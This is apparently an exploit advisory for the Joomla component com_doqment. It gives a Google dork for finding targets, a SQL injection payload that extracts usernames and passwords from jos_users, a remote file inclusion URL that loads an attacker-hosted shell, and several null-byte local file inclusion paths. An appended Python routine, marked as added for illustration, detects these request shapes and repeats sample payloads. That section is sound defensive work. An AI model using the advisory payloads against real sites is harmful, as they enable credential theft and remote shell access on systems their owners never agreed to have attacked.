Author : KedAns-Dz
Go0gle Dork : " inurl:com_doqment "
#==============>>>>> Exploit (1) SQL Injection %100 <<<<<=================#
> SQL : -11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
> ExplO!t :
http://[Target]/[Path]/index.php?option=com_doqment&cid= ! [ SQL Here ] !
#==============>>>>> Exploit (2) Remote File Inclusion %50 <<<<<=================#
> DzShell :
http://[Your-Space]/Sh311.php
> ComBug : admin.ponygallery.html.php?mosConfig_absolute_path =
> ExplO!t :
http://[Target]/[Path]/index.php?option=com_doqment&cid=[+ ComBug +]=[ ! DzShell ! ]
""" Note for this RFI exploit : 50% because not all sites have the component 'ponygallery' in 'com_doqment' """
#==============>>>>> Exploit (3) Local File Inclusion %50 <<<<<=================#
> ExplO!t :
http://[Target]/[Path]/components/com_doqment/documents?file=[LFI]%00
>
http://[Target]/[Path]/components/com_doqment/documents/file?id=[LFI]%00
>
http://[Target]/[Path]/components/com_doqment/documents/?=[LFI]%00
>
http://[Target]/[Path]/components/com_doqment/files/?=[LFI]%00
>
http://[Target]/[Path]/components/com_doqment/file/?=[LFI]%00
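
Added example, not part of the original advisory: a detection routine that labels web-server request targets matching the three request shapes listed above (non-integer `cid` with UNION/SELECT, `mosConfig_absolute_path` pointing at a remote URL, and a null byte under `components/com_doqment/`). The sample request targets, the label names and the `classify`/`scan` helpers are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request targets modelled on the three URL shapes in this advisory.
SAMPLE_REQUESTS = [
    "/index.php?option=com_doqment&cid=12",
    "/index.php?option=com_doqment&cid=-11/**/UNION/**/select/**/1,2,3--",
    "/index.php?option=com_doqment&cid=admin.ponygallery.html.php"
    "?mosConfig_absolute_path=http://host.invalid/x.php",
    "/components/com_doqment/documents?file=../../x%00",
    "/index.php?option=com_content&id=5",
]

# UNION ... SELECT separated by whitespace or SQL comments such as /**/.
UNION_SELECT = re.compile(r"union(?:\s|/\*.*?\*/)+select", re.I | re.S)
# mosConfig_absolute_path set to a remote URL (the RFI shape).
REMOTE_PATH = re.compile(r"mosconfig_absolute_path\s*=\s*(?:https?|ftp)://", re.I)


def classify(target: str) -> list[str]:
    """Label a request target with the advisory bug classes it resembles."""
    decoded = unquote(target)
    if "com_doqment" not in decoded.lower():
        return []
    labels = []
    query = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    cid = query.get("cid")
    # cid is expected to be a plain integer id; anything else is suspicious.
    if cid is not None and not re.fullmatch(r"[0-9]+", cid):
        labels.append("cid-not-integer")
        if UNION_SELECT.search(cid):
            labels.append("sqli")
    if REMOTE_PATH.search(decoded):
        labels.append("rfi")
    # %00 decodes to a NUL byte, which no legitimate file request contains.
    if "/components/com_doqment/" in decoded.lower() and "\x00" in decoded:
        labels.append("lfi-null-byte")
    return labels


def scan(targets):
    """Return {target: labels} for every target that matched a rule."""
    return {t: hits for t in targets if (hits := classify(t))}


if __name__ == "__main__":
    for target, hits in scan(SAMPLE_REQUESTS).items():
        print(",".join(hits), repr(target))
```

The `cid-not-integer` label fires regardless of payload keywords, so it also catches encodings the UNION/SELECT pattern misses.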